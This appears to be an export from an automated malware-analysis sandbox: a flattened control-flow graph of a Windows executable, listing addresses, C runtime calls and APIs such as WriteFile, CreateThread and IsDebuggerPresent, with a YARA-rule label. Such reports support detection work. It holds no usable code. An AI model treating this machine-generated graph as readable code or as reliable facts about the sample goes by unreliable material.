e21b11 60 API calls 3 library calls 98904->98963 98905 e214f4 98962 e18d68 58 API calls __getptd_noexit 98905->98962 98906->98898 98906->98904 98906->98905 98906->98910 98908->98898 98908->98902 98909->98915 98910->98893 98910->98898 98914->98899 98961 e21b11 60 API calls 3 library calls 98914->98961 98915->98908 98964 e21b11 60 API calls 3 library calls 98915->98964 98917 e20e02 98916->98917 98921 e20e17 98916->98921 99003 e18d68 58 API calls __getptd_noexit 98917->99003 98919 e20e07 99004 e18ff6 9 API calls strtoxl 98919->99004 98922 e20e4c 98921->98922 98928 e20e12 98921->98928 99005 e26234 58 API calls __malloc_crt 98921->99005 98924 e14916 __fputwc_nolock 58 API calls 98922->98924 98925 e20e60 98924->98925 98970 e20f97 98925->98970 98927 e20e67 98927->98928 98929 e14916 __fputwc_nolock 58 API calls 98927->98929 98928->98834 98930 e20e8a 98929->98930 98930->98928 98931 e14916 __fputwc_nolock 58 API calls 98930->98931 98932 e20e96 98931->98932 98932->98928 98933 e14916 __fputwc_nolock 58 API calls 98932->98933 98934 e20ea3 98933->98934 98935 e14916 __fputwc_nolock 58 API calls 98934->98935 98935->98928 98936->98837 98937->98829 98938->98834 98939->98837 98940->98845 98941->98847 98943 e25ed3 98942->98943 98944 e25ec6 98942->98944 98947 e25edf 98943->98947 98948 e18d68 strtoxl 58 API calls 98943->98948 98945 e18d68 strtoxl 58 API calls 98944->98945 98946 e25ecb 98945->98946 98946->98876 98947->98876 98949 e25f00 98948->98949 98950 e18ff6 strtoxl 9 API calls 98949->98950 98950->98946 98951->98853 98952->98896 98953->98862 98954->98861 98955->98862 98956->98873 98957->98880 98958->98896 98959->98872 98960->98898 98961->98914 98962->98898 98963->98910 98964->98915 98965->98892 98966->98898 98967->98857 98968->98861 98969->98896 98971 e20fa3 __mtinitlocknum 98970->98971 98972 e20fb0 98971->98972 98973 e20fc7 98971->98973 98975 e18d34 __read_nolock 58 API calls 98972->98975 98974 e2108b 98973->98974 98976 e20fdb 98973->98976 98977 e18d34 __read_nolock 58 API calls 98974->98977 98978 e20fb5 98975->98978 98979 e21006 98976->98979 98980 e20ff9 98976->98980 98981 e20ffe 98977->98981 98982 e18d68 strtoxl 58 API calls 98978->98982 98985 e21013 98979->98985 98986 e21028 98979->98986 98984 e18d34 __read_nolock 58 API calls 98980->98984 98989 e18d68 strtoxl 58 API calls 98981->98989 98983 e20fbc __mtinitlocknum 98982->98983 98983->98927 98984->98981 98987 e18d34 __read_nolock 58 API calls 98985->98987 98988 e1d446 ___lock_fhandle 59 API calls 98986->98988 98991 e21018 98987->98991 98992 e2102e 98988->98992 98990 e21020 98989->98990 98997 e18ff6 strtoxl 9 API calls 98990->98997 98995 e18d68 strtoxl 58 API calls 98991->98995 98993 e21041 98992->98993 98994 e21054 98992->98994 98996 e210ab __read_nolock 70 API calls 98993->98996 98998 e18d68 strtoxl 58 API calls 98994->98998 98995->98990 98999 e2104d 98996->98999 98997->98983 99000 e21059 98998->99000 99002 e21083 __read LeaveCriticalSection 98999->99002 99001 e18d34 __read_nolock 58 API calls 99000->99001 99001->98999 99002->98983 99003->98919 99004->98928 99005->98922 99009 e1543a GetSystemTimeAsFileTime 99006->99009 99008 e591f8 99008->98601 99010 e15468 __aulldiv 99009->99010 99010->99008 99012 e15e9c __mtinitlocknum 99011->99012 99013 e15ec3 99012->99013 99014 e15eae 99012->99014 99016 e16e4e __lock_file 59 API calls 99013->99016 99025 e18d68 58 API calls __getptd_noexit 99014->99025 99018 e15ec9 99016->99018 99017 e15eb3 99026 e18ff6 9 API calls strtoxl 99017->99026 99027 e15b00 67 API calls 6 library calls 99018->99027 99021 e15ed4 99028 e15ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99021->99028 99023 e15ee6 99024 e15ebe __mtinitlocknum 99023->99024 99024->98606 99025->99017 99026->99024 99027->99021 99028->99023 99029->98488 99030->98501 99031->98503 99032->98499 99033->98508 99039 e599d2 __tzset_nolock _wcscmp 99034->99039 99035 df506b 74 API calls 99035->99039 99036 e59866 99036->98519 99036->98547 99037 e59393 GetSystemTimeAsFileTime 99037->99039 99038 df5045 85 API calls 99038->99039 99039->99035 99039->99036 99039->99037 99039->99038 99041 e58d9b 99040->99041 99042 e58da9 99040->99042 99043 e1548b 115 API calls 99041->99043 99044 e58dee 99042->99044 99045 e1548b 115 API calls 99042->99045 99070 e58db2 99042->99070 99043->99042 99071 e5901b 99044->99071 99047 e58dd3 99045->99047 99047->99044 99051 e58ddc 99047->99051 99048 e58e32 99049 e58e57 99048->99049 99050 e58e36 99048->99050 99075 e58c33 99049->99075 99053 e58e43 99050->99053 99056 e155d6 __fcloseall 83 API calls 99050->99056 99054 e155d6 __fcloseall 83 API calls 99051->99054 99051->99070 99059 e155d6 __fcloseall 83 API calls 99053->99059 99053->99070 99054->99070 99056->99053 99057 e58e85 99084 e58eb5 99057->99084 99058 e58e65 99060 e58e72 99058->99060 99062 e155d6 __fcloseall 83 API calls 99058->99062 99059->99070 99064 e155d6 __fcloseall 83 API calls 99060->99064 99060->99070 99062->99060 99064->99070 99067 e58ea0 99069 e155d6 __fcloseall 83 API calls 99067->99069 99067->99070 99069->99070 99070->98548 99072 e59040 99071->99072 99073 e59029 __tzset_nolock _memmove 99071->99073 99074 e15812 __fread_nolock 74 API calls 99072->99074 99073->99048 99074->99073 99076 e1594c std::exception::_Copy_str 58 API calls 99075->99076 99077 e58c42 99076->99077 99078 e1594c std::exception::_Copy_str 58 API calls 99077->99078 99079 e58c56 99078->99079 99080 e1594c std::exception::_Copy_str 58 API calls 99079->99080 99081 e58c6a 99080->99081 99082 e58f97 58 API calls 99081->99082 99083 e58c7d 99081->99083 99082->99083 99083->99057 99083->99058 99085 e58eca 99084->99085 99086 e58f82 99085->99086 99087 e58c8f 74 API calls 99085->99087 99091 e58e8c 99085->99091 99113 e5909c 99085->99113 99121 e58d2b 74 API calls 99085->99121 99117 e591bf 99086->99117 99087->99085 99092 e58f97 99091->99092 99093 e58fa4 99092->99093 99094 e58faa 99092->99094 99095 e12f95 _free 58 API calls 99093->99095 99096 e58fbb 99094->99096 99098 e12f95 _free 58 API calls 99094->99098 99095->99094 99097 e58e93 99096->99097 99099 e12f95 _free 58 API calls 99096->99099 99097->99067 99100 e155d6 99097->99100 99098->99096 99099->99097 99101 e155e2 __mtinitlocknum 99100->99101 99102 e155f6 99101->99102 99104 e1560e 99101->99104 99170 e18d68 58 API calls __getptd_noexit 99102->99170 99106 e15606 __mtinitlocknum 99104->99106 99107 e16e4e __lock_file 59 API calls 99104->99107 99105 e155fb 99171 e18ff6 9 API calls strtoxl 99105->99171 99106->99067 99109 e15620 99107->99109 99154 e1556a 99109->99154 99114 e590eb 99113->99114 99115 e590ab 99113->99115 99114->99115 99122 e59172 99114->99122 99115->99085 99118 e591cc 99117->99118 99120 e591dd 99117->99120 99119 e14a93 80 API calls 99118->99119 99119->99120 99120->99091 99121->99085 99123 e5919e 99122->99123 99124 e591af 99122->99124 99126 e14a93 99123->99126 99124->99114 99127 e14a9f __mtinitlocknum 99126->99127 99128 e14ad5 99127->99128 99129 e14abd 99127->99129 99130 e14acd __mtinitlocknum 99127->99130 99131 e16e4e __lock_file 59 API calls 99128->99131 99151 e18d68 58 API calls __getptd_noexit 99129->99151 99130->99124 99133 e14adb 99131->99133 99139 e1493a 99133->99139 99134 e14ac2 99152 e18ff6 9 API calls strtoxl 99134->99152 99140 e14967 99139->99140 99142 e14949 99139->99142 99153 e14b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99140->99153 99141 e14957 99143 e18d68 strtoxl 58 API calls 99141->99143 99142->99140 99142->99141 99144 e14981 _memmove 99142->99144 99145 e1495c 99143->99145 99144->99140 99147 e1b05e __flsbuf 78 API calls 99144->99147 99148 e14c6d __flush 78 API calls 99144->99148 99149 e14916 __fputwc_nolock 58 API calls 99144->99149 99150 e1dac6 __write 78 API calls 99144->99150 99146 e18ff6 strtoxl 9 API calls 99145->99146 99146->99140 99147->99144 99148->99144 99149->99144 99150->99144 99151->99134 99152->99130 99153->99130 99155 e15579 99154->99155 99156 e1558d 99154->99156 99209 e18d68 58 API calls __getptd_noexit 99155->99209 99159 e15589 99156->99159 99173 e14c6d 99156->99173 99158 e1557e 99210 e18ff6 9 API calls strtoxl 99158->99210 99172 e15645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99159->99172 99165 e14916 __fputwc_nolock 58 API calls 99166 e155a7 99165->99166 99183 e20c52 99166->99183 99168 e155ad 99168->99159 99169 e12f95 _free 58 API calls 99168->99169 99169->99159 99170->99105 99171->99106 99172->99106 99174 e14ca4 99173->99174 99175 e14c80 99173->99175 99179 e20dc7 99174->99179 99175->99174 99176 e14916 __fputwc_nolock 58 API calls 99175->99176 99177 e14c9d 99176->99177 99211 e1dac6 99177->99211 99180 e155a1 99179->99180 99181 e20dd4 99179->99181 99180->99165 99181->99180 99182 e12f95 _free 58 API calls 99181->99182 99182->99180 99184 e20c5e __mtinitlocknum 99183->99184 99185 e20c82 99184->99185 99186 e20c6b 99184->99186 99188 e20d0d 99185->99188 99190 e20c92 99185->99190 99336 e18d34 58 API calls __getptd_noexit 99186->99336 99341 e18d34 58 API calls __getptd_noexit 99188->99341 99189 e20c70 99337 e18d68 58 API calls __getptd_noexit 99189->99337 99193 e20cb0 99190->99193 99194 e20cba 99190->99194 99338 e18d34 58 API calls __getptd_noexit 99193->99338 99197 e1d446 ___lock_fhandle 59 API calls 99194->99197 99195 e20cb5 99342 e18d68 58 API calls __getptd_noexit 99195->99342 99199 e20cc0 99197->99199 99201 e20cd3 99199->99201 99202 e20cde 99199->99202 99200 e20d19 99343 e18ff6 9 API calls strtoxl 99200->99343 99321 e20d2d 99201->99321 99339 e18d68 58 API calls __getptd_noexit 99202->99339 99203 e20c77 __mtinitlocknum 99203->99168 99207 e20cd9 99340 e20d05 LeaveCriticalSection __unlock_fhandle 99207->99340 99209->99158 99210->99159 99212 e1dad2 __mtinitlocknum 99211->99212 99213 e1daf6 99212->99213 99214 e1dadf 99212->99214 99215 e1db95 99213->99215 99217 e1db0a 99213->99217 99312 e18d34 58 API calls __getptd_noexit 99214->99312 99318 e18d34 58 API calls __getptd_noexit 99215->99318 99220 e1db32 99217->99220 99221 e1db28 99217->99221 99219 e1dae4 99313 e18d68 58 API calls __getptd_noexit 99219->99313 99239 e1d446 99220->99239 99314 e18d34 58 API calls __getptd_noexit 99221->99314 99222 e1db2d 99319 e18d68 58 API calls __getptd_noexit 99222->99319 99226 e1db38 99228 e1db4b 99226->99228 99229 e1db5e 99226->99229 99248 e1dbb5 99228->99248 99315 e18d68 58 API calls __getptd_noexit 99229->99315 99230 e1dba1 99320 e18ff6 9 API calls strtoxl 99230->99320 99234 e1daeb __mtinitlocknum 99234->99174 99235 e1db57 99317 e1db8d LeaveCriticalSection __unlock_fhandle 99235->99317 99236 e1db63 99316 e18d34 58 API calls __getptd_noexit 99236->99316 99240 e1d452 __mtinitlocknum 99239->99240 99241 e1d4a1 EnterCriticalSection 99240->99241 99242 e19e4b __lock 58 API calls 99240->99242 99243 e1d4c7 __mtinitlocknum 99241->99243 99244 e1d477 99242->99244 99243->99226 99245 e1d48f 99244->99245 99246 e1a06b __mtinitlocknum InitializeCriticalSectionAndSpinCount 99244->99246 99247 e1d4cb ___lock_fhandle LeaveCriticalSection 99245->99247 99246->99245 99247->99241 99249 e1dbc2 __write_nolock 99248->99249 99250 e1dbf6 99249->99250 99251 e1dc01 99249->99251 99252 e1dc20 99249->99252 99253 e1c836 __fltout2 6 API calls 99250->99253 99254 e18d34 __read_nolock 58 API calls 99251->99254 99255 e1dc78 99252->99255 99256 e1dc5c 99252->99256 99257 e1e416 99253->99257 99258 e1dc06 99254->99258 99260 e1dc91 99255->99260 99264 e21b11 __lseeki64_nolock 60 API calls 99255->99264 99259 e18d34 __read_nolock 58 API calls 99256->99259 99257->99235 99261 e18d68 strtoxl 58 API calls 99258->99261 99263 e1dc61 99259->99263 99262 e25ebb __read_nolock 58 API calls 99260->99262 99265 e1dc0d 99261->99265 99267 e1dc9f 99262->99267 99268 e18d68 strtoxl 58 API calls 99263->99268 99264->99260 99266 e18ff6 strtoxl 9 API calls 99265->99266 99266->99250 99269 e1dff8 99267->99269 99274 e19bec __write_nolock 58 API calls 99267->99274 99270 e1dc68 99268->99270 99271 e1e016 99269->99271 99272 e1e38b WriteFile 99269->99272 99273 e18ff6 strtoxl 9 API calls 99270->99273 99275 e1e13a 99271->99275 99287 e1e02c 99271->99287 99276 e1dfeb GetLastError 99272->99276 99279 e1dfb8 99272->99279 99273->99250 99277 e1dccb GetConsoleMode 99274->99277 99286 e1e22f 99275->99286 99289 e1e145 99275->99289 99276->99279 99277->99269 99280 e1dd0a 99277->99280 99278 e1e3c4 99278->99250 99281 e18d68 strtoxl 58 API calls 99278->99281 99279->99250 99279->99278 99285 e1e118 99279->99285 99280->99269 99282 e1dd1a GetConsoleCP 99280->99282 99284 e1e3f2 99281->99284 99282->99278 99308 e1dd49 99282->99308 99283 e1e09b WriteFile 99283->99276 99288 e1e0d8 99283->99288 99292 e18d34 __read_nolock 58 API calls 99284->99292 99293 e1e123 99285->99293 99294 e1e3bb 99285->99294 99286->99278 99295 e1e2a4 WideCharToMultiByte 99286->99295 99287->99278 99287->99283 99288->99287 99290 e1e0fc 99288->99290 99289->99278 99291 e1e1aa WriteFile 99289->99291 99290->99279 99291->99276 99296 e1e1f9 99291->99296 99292->99250 99297 e18d68 strtoxl 58 API calls 99293->99297 99298 e18d47 __dosmaperr 58 API calls 99294->99298 99295->99276 99304 e1e2eb 99295->99304 99296->99279 99296->99289 99296->99290 99300 e1e128 99297->99300 99298->99250 99299 e1e2f3 WriteFile 99302 e1e346 GetLastError 99299->99302 99299->99304 99303 e18d34 __read_nolock 58 API calls 99300->99303 99301 e13835 __write_nolock 58 API calls 99301->99308 99302->99304 99303->99250 99304->99279 99304->99286 99304->99290 99304->99299 99305 e2650a 60 API calls __write_nolock 99305->99308 99306 e1de32 WideCharToMultiByte 99306->99279 99307 e1de6d WriteFile 99306->99307 99307->99276 99310 e1de9f 99307->99310 99308->99279 99308->99301 99308->99305 99308->99306 99308->99310 99309 e27cae WriteConsoleW CreateFileW __putwch_nolock 99309->99310 99310->99276 99310->99279 99310->99308 99310->99309 99311 e1dec7 WriteFile 99310->99311 99311->99276 99311->99310 99312->99219 99313->99234 99314->99222 99315->99236 99316->99235 99317->99234 99318->99222 99319->99230 99320->99234 99344 e1d703 99321->99344 99323 e20d3b 99324 e20d91 99323->99324 99325 e20d6f 99323->99325 99328 e1d703 __close_nolock 58 API calls 99323->99328 99357 e1d67d 59 API calls 2 library calls 99324->99357 99325->99324 99329 e1d703 __close_nolock 58 API calls 99325->99329 99327 e20d99 99330 e20dbb 99327->99330 99358 e18d47 58 API calls 3 library calls 99327->99358 99331 e20d66 99328->99331 99332 e20d7b FindCloseChangeNotification 99329->99332 99330->99207 99334 e1d703 __close_nolock 58 API calls 99331->99334 99332->99324 99335 e20d87 GetLastError 99332->99335 99334->99325 99335->99324 99336->99189 99337->99203 99338->99195 99339->99207 99340->99203 99341->99195 99342->99200 99343->99203 99345 e1d70e 99344->99345 99346 e1d723 99344->99346 99347 e18d34 __read_nolock 58 API calls 99345->99347 99349 e18d34 __read_nolock 58 API calls 99346->99349 99351 e1d748 99346->99351 99348 e1d713 99347->99348 99350 e18d68 strtoxl 58 API calls 99348->99350 99352 e1d752 99349->99352 99353 e1d71b 99350->99353 99351->99323 99354 e18d68 strtoxl 58 API calls 99352->99354 99353->99323 99355 e1d75a 99354->99355 99356 e18ff6 strtoxl 9 API calls 99355->99356 99356->99353 99357->99327 99358->99330 99360 e21b90 __write_nolock 99359->99360 99361 e109e2 GetLongPathNameW 99360->99361 99362 df7d2c 59 API calls 99361->99362 99363 df741d 99362->99363 99364 df716b 99363->99364 99365 df77c7 59 API calls 99364->99365 99366 df717d 99365->99366 99367 df48ae 60 API calls 99366->99367 99368 df7188 99367->99368 99369 e2ecae 99368->99369 99370 df7193 99368->99370 99375 e2ecc8 99369->99375 99417 df7a68 61 API calls 99369->99417 99371 df3f84 59 API calls 99370->99371 99373 df719f 99371->99373 99411 df34c2 99373->99411 99376 df71b2 Mailbox 99376->98337 99378 df4f3d 136 API calls 99377->99378 99379 df69ef 99378->99379 99380 e2e45a 99379->99380 99382 df4f3d 136 API calls 99379->99382 99381 e597e5 122 API calls 99380->99381 99383 e2e46f 99381->99383 99384 df6a03 99382->99384 99385 e2e473 99383->99385 99386 e2e490 99383->99386 99384->99380 99387 df6a0b 99384->99387 99388 df4faa 84 API calls 99385->99388 99389 e10ff6 Mailbox 59 API calls 99386->99389 99390 df6a17 99387->99390 99391 e2e47b 99387->99391 99388->99391 99400 e2e4d5 Mailbox 99389->99400 99418 df6bec 99390->99418 99511 e54534 90 API calls _wprintf 99391->99511 99394 e2e489 99394->99386 99396 e2e689 99397 e12f95 _free 58 API calls 99396->99397 99398 e2e691 99397->99398 99399 df4faa 84 API calls 99398->99399 99405 e2e69a 99399->99405 99400->99396 99400->99405 99408 df7f41 59 API calls 99400->99408 99512 e4fc4d 59 API calls 2 library calls 99400->99512 99513 e4fb6e 61 API calls 2 library calls 99400->99513 99514 e57621 59 API calls Mailbox 99400->99514 99515 df766f 59 API calls 2 library calls 99400->99515 99516 df74bd 59 API calls Mailbox 99400->99516 99404 e12f95 _free 58 API calls 99404->99405 99405->99404 99407 df4faa 84 API calls 99405->99407 99517 e4fcb1 89 API calls 4 library calls 99405->99517 99407->99405 99408->99400 99412 df34d4 99411->99412 99416 df34f3 _memmove 99411->99416 99415 e10ff6 Mailbox 59 API calls 99412->99415 99413 e10ff6 Mailbox 59 API calls 99414 df350a 99413->99414 99414->99376 99415->99416 99416->99413 99417->99369 99419 e2e847 99418->99419 99420 df6c15 99418->99420 99590 e4fcb1 89 API calls 4 library calls 99419->99590 99523 df5906 60 API calls Mailbox 99420->99523 99423 e2e85a 99591 e4fcb1 89 API calls 4 library calls 99423->99591 99424 df6c37 99524 df5956 67 API calls 99424->99524 99426 df6c4c 99426->99423 99428 df6c54 99426->99428 99430 df77c7 59 API calls 99428->99430 99429 e2e876 99433 df6cc1 99429->99433 99431 df6c60 99430->99431 99525 e10b9b 60 API calls __write_nolock 99431->99525 99435 df6ccf 99433->99435 99436 e2e889 99433->99436 99434 df6c6c 99437 df77c7 59 API calls 99434->99437 99439 df77c7 59 API calls 99435->99439 99438 df5dcf CloseHandle 99436->99438 99440 df6c78 99437->99440 99441 e2e895 99438->99441 99442 df6cd8 99439->99442 99443 df48ae 60 API calls 99440->99443 99444 df4f3d 136 API calls 99441->99444 99445 df77c7 59 API calls 99442->99445 99446 df6c86 99443->99446 99447 e2e8b1 99444->99447 99448 df6ce1 99445->99448 99526 df59b0 ReadFile SetFilePointerEx 99446->99526 99450 e2e8da 99447->99450 99455 e597e5 122 API calls 99447->99455 99528 df46f9 99448->99528 99592 e4fcb1 89 API calls 4 library calls 99450->99592 99452 df6cf8 99456 df7c8e 59 API calls 99452->99456 99454 df6cb2 99527 df5c4e SetFilePointerEx SetFilePointerEx 99454->99527 99459 e2e8cd 99455->99459 99460 df6d09 SetCurrentDirectoryW 99456->99460 99457 e2e8f1 99489 df6e6c Mailbox 99457->99489 99461 e2e8f6 99459->99461 99462 e2e8d5 99459->99462 99467 df6d1c Mailbox 99460->99467 99464 df4faa 84 API calls 99461->99464 99463 df4faa 84 API calls 99462->99463 99463->99450 99465 e2e8fb 99464->99465 99466 e10ff6 Mailbox 59 API calls 99465->99466 99473 e2e92f 99466->99473 99469 e10ff6 Mailbox 59 API calls 99467->99469 99471 df6d2f 99469->99471 99470 df3bcd 99470->98196 99470->98205 99472 df538e 59 API calls 99471->99472 99500 df6d3a Mailbox __wsetenvp 99472->99500 99593 df766f 59 API calls 2 library calls 99473->99593 99475 df6e47 99586 df5dcf 99475->99586 99476 e2eb69 99599 e57581 59 API calls Mailbox 99476->99599 99482 e2eb8b 99600 e5f835 59 API calls 2 library calls 99482->99600 99485 e2eb98 99487 e12f95 _free 58 API calls 99485->99487 99486 e2ec02 99487->99489 99518 df5934 99489->99518 99494 e2ebfa 99602 e4fb07 59 API calls 4 library calls 99494->99602 99497 df7f41 59 API calls 99497->99500 99500->99475 99500->99486 99500->99494 99500->99497 99579 df59cd 67 API calls _wcscpy 99500->99579 99580 df70bd GetStringTypeW 99500->99580 99581 df702c 60 API calls __wcsnicmp 99500->99581 99582 df710a GetStringTypeW __wsetenvp 99500->99582 99583 e1387d GetStringTypeW _iswctype 99500->99583 99584 df6a3c 165 API calls 3 library calls 99500->99584 99585 df7373 59 API calls Mailbox 99500->99585 99501 df7f41 59 API calls 99508 e2e978 Mailbox 99501->99508 99505 e2ebbb 99601 e4fcb1 89 API calls 4 library calls 99505->99601 99507 e2ebd4 99509 e12f95 _free 58 API calls 99507->99509 99508->99476 99508->99501 99508->99505 99594 e4fc4d 59 API calls 2 library calls 99508->99594 99595 e4fb6e 61 API calls 2 library calls 99508->99595 99596 e57621 59 API calls Mailbox 99508->99596 99597 df766f 59 API calls 2 library calls 99508->99597 99598 df7373 59 API calls Mailbox 99508->99598 99510 e2ebe7 99509->99510 99510->99489 99511->99394 99512->99400 99513->99400 99514->99400 99515->99400 99516->99400 99517->99405 99519 df5dcf CloseHandle 99518->99519 99520 df593c Mailbox 99519->99520 99521 df5dcf CloseHandle 99520->99521 99522 df594b 99521->99522 99522->99470 99523->99424 99524->99426 99525->99434 99526->99454 99527->99433 99529 df77c7 59 API calls 99528->99529 99530 df470f 99529->99530 99531 df77c7 59 API calls 99530->99531 99532 df4717 99531->99532 99533 df77c7 59 API calls 99532->99533 99534 df471f 99533->99534 99535 df77c7 59 API calls 99534->99535 99536 df4727 99535->99536 99537 df475b 99536->99537 99538 e2d8fb 99536->99538 99539 df79ab 59 API calls 99537->99539 99540 df81a7 59 API calls 99538->99540 99541 df4769 99539->99541 99542 e2d904 99540->99542 99543 df7e8c 59 API calls 99541->99543 99544 df7eec 59 API calls 99542->99544 99545 df4773 99543->99545 99547 df479e 99544->99547 99546 df79ab 59 API calls 99545->99546 99545->99547 99550 df4794 99546->99550 99548 df47de 99547->99548 99551 df47bd 99547->99551 99561 e2d924 99547->99561 99549 df79ab 59 API calls 99548->99549 99553 df47ef 99549->99553 99554 df7e8c 59 API calls 99550->99554 99552 df7b52 59 API calls 99551->99552 99556 df47c7 99552->99556 99557 df4801 99553->99557 99559 df81a7 59 API calls 99553->99559 99554->99547 99555 e2d9f4 99558 df7d2c 59 API calls 99555->99558 99556->99548 99562 df79ab 59 API calls 99556->99562 99560 df4811 99557->99560 99563 df81a7 59 API calls 99557->99563 99574 e2d9b1 99558->99574 99559->99557 99565 df4818 99560->99565 99566 df81a7 59 API calls 99560->99566 99561->99555 99564 e2d9dd 99561->99564 99573 e2d95b 99561->99573 99562->99548 99563->99560 99564->99555 99570 e2d9c8 99564->99570 99567 df81a7 59 API calls 99565->99567 99576 df481f Mailbox 99565->99576 99566->99565 99567->99576 99568 df7b52 59 API calls 99568->99574 99569 e2d9b9 99571 df7d2c 59 API calls 99569->99571 99572 df7d2c 59 API calls 99570->99572 99571->99574 99572->99574 99573->99569 99577 e2d9a4 99573->99577 99574->99548 99574->99568 99604 df7a84 59 API calls 2 library calls 99574->99604 99576->99452 99578 df7d2c 59 API calls 99577->99578 99578->99574 99579->99500 99580->99500 99581->99500 99582->99500 99583->99500 99584->99500 99585->99500 99590->99423 99591->99429 99592->99457 99593->99508 99594->99508 99595->99508 99596->99508 99597->99508 99598->99508 99599->99482 99600->99485 99601->99507 99602->99486 99604->99574 99606 df7009 99605->99606 99607 df6ef5 99605->99607 99606->98343 99607->99606 99608 e10ff6 Mailbox 59 API calls 99607->99608 99610 df6f1c 99608->99610 99609 e10ff6 Mailbox 59 API calls 99615 df6f91 99609->99615 99610->99609 99615->99606 99618 df63a0 94 API calls 2 library calls 99615->99618 99619 df74bd 59 API calls Mailbox 99615->99619 99620 e46ac9 59 API calls Mailbox 99615->99620 99621 df766f 59 API calls 2 library calls 99615->99621 99616->98345 99617->98347 99618->99615 99619->99615 99620->99615 99621->99615 99622->98362 99623->98361 99770->98379 99771->98379 100273 e30251 100274 e0fb84 60 API calls 100273->100274 100275 e30267 100274->100275 100276 e302e8 100275->100276 100277 e3027d 100275->100277 100280 dffe40 341 API calls 100276->100280 100285 df9fbd 60 API calls 100277->100285 100279 e302dc Mailbox 100284 e30ce1 Mailbox 100279->100284 100287 e5a0b5 89 API calls 4 library calls 100279->100287 100280->100279 100282 e302bc 100282->100279 100286 e585d9 59 API calls Mailbox 100282->100286 100285->100282 100286->100279 100287->100284 100288 dfe70b 100291 dfd260 100288->100291 100290 dfe719 100292 dfd27d 100291->100292 100293 dfd4dd 100291->100293 100294 e32abb 100292->100294 100295 e32b0a 100292->100295 100300 dfd2a4 100292->100300 100305 dfd6ab 100293->100305 100339 e5a0b5 89 API calls 4 library calls 100293->100339 100297 e32abe 100294->100297 100306 e32ad9 100294->100306 100335 e6a6fb 341 API calls __cinit 100295->100335 100299 e32aca 100297->100299 100297->100300 100333 e6ad0f 341 API calls 100299->100333 100300->100293 100301 e12f80 __cinit 67 API calls 100300->100301 100300->100305 100310 e32c26 100300->100310 100314 df8620 69 API calls 100300->100314 100316 dfd594 100300->100316 100320 df9e9c 60 API calls 100300->100320 100322 dfa000 341 API calls 100300->100322 100323 df81a7 59 API calls 100300->100323 100325 df88a0 68 API calls __cinit 100300->100325 100326 df86a2 68 API calls 100300->100326 100328 df859a 68 API calls 100300->100328 100329 dfd0dc 341 API calls 100300->100329 100330 df9f3a 59 API calls Mailbox 100300->100330 100331 dfd060 89 API calls 100300->100331 100332 dfcedd 341 API calls 100300->100332 100336 df8bb2 68 API calls 100300->100336 100337 e46d03 60 API calls 100300->100337 100301->100300 100304 e32cdf 100304->100304 100305->100290 100306->100293 100334 e6b1b7 341 API calls 3 library calls 100306->100334 100338 e6aa66 89 API calls 100310->100338 100311 dfd5a3 100311->100290 100314->100300 100327 df8bb2 68 API calls 100316->100327 100320->100300 100322->100300 100323->100300 100325->100300 100326->100300 100327->100311 100328->100300 100329->100300 100330->100300 100331->100300 100332->100300 100333->100305 100334->100293 100335->100300 100336->100300 100337->100300 100338->100293 100339->100304 100340 dfe608 100341 dfd260 341 API calls 100340->100341 100342 dfe616 100341->100342 100343 df1066 100348 dff8cf 100343->100348 100345 df106c 100346 e12f80 __cinit 67 API calls 100345->100346 100347 df1076 100346->100347 100349 dff8f0 100348->100349 100381 e10143 100349->100381 100353 dff937 100354 df77c7 59 API calls 100353->100354 100355 dff941 100354->100355 100356 df77c7 59 API calls 100355->100356 100357 dff94b 100356->100357 100358 df77c7 59 API calls 100357->100358 100359 dff955 100358->100359 100360 df77c7 59 API calls 100359->100360 100361 dff993 100360->100361 100362 df77c7 59 API calls 100361->100362 100363 dffa5e 100362->100363 100391 e060e7 100363->100391 100367 dffa90 100368 df77c7 59 API calls 100367->100368 100369 dffa9a 100368->100369 100419 e0ffde 100369->100419 100371 dffae1 100372 dffaf1 GetStdHandle 100371->100372 100373 dffb3d 100372->100373 100374 e349d5 100372->100374 100375 dffb45 OleInitialize 100373->100375 100374->100373 100376 e349de 100374->100376 100375->100345 100426 e56dda 64 API calls Mailbox 100376->100426 100378 e349e5 100427 e574a9 CreateThread 100378->100427 100380 e349f1 CloseHandle 100380->100375 100428 e1021c 100381->100428 100384 e1021c 59 API calls 100385 e10185 100384->100385 100386 df77c7 59 API calls 100385->100386 100387 e10191 100386->100387 100388 df7d2c 59 API calls 100387->100388 100389 dff8f6 100388->100389 100390 e103a2 6 API calls 100389->100390 100390->100353 100392 df77c7 59 API calls 100391->100392 100393 e060f7 100392->100393 100394 df77c7 59 API calls 100393->100394 100395 e060ff 100394->100395 100435 e05bfd 100395->100435 100398 e05bfd 59 API calls 100399 e0610f 100398->100399 100400 df77c7 59 API calls 100399->100400 100401 e0611a 100400->100401 100402 e10ff6 Mailbox 59 API calls 100401->100402 100403 dffa68 100402->100403 100404 e06259 100403->100404 100405 e06267 100404->100405 100406 df77c7 59 API calls 100405->100406 100407 e06272 100406->100407 100408 df77c7 59 API calls 100407->100408 100409 e0627d 100408->100409 100410 df77c7 59 API calls 100409->100410 100411 e06288 100410->100411 100412 df77c7 59 API calls 100411->100412 100413 e06293 100412->100413 100414 e05bfd 59 API calls 100413->100414 100415 e0629e 100414->100415 100416 e10ff6 Mailbox 59 API calls 100415->100416 100417 e062a5 RegisterWindowMessageW 100416->100417 100417->100367 100420 e45cc3 100419->100420 100421 e0ffee 100419->100421 100438 e59d71 60 API calls 100420->100438 100423 e10ff6 Mailbox 59 API calls 100421->100423 100425 e0fff6 100423->100425 100424 e45cce 100425->100371 100426->100378 100427->100380 100439 e5748f 65 API calls 100427->100439 100429 df77c7 59 API calls 100428->100429 100430 e10227 100429->100430 100431 df77c7 59 API calls 100430->100431 100432 e1022f 100431->100432 100433 df77c7 59 API calls 100432->100433 100434 e1017b 100433->100434 100434->100384 100436 df77c7 59 API calls 100435->100436 100437 e05c05 100436->100437 100437->100398 100438->100424

                                          Executed Functions

                                          Function 00DF3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DF3B7A
                                          • IsDebuggerPresent.KERNEL32 ref: 00DF3B8C
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EB62F8,00EB62E0,?,?), ref: 00DF3BFD
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
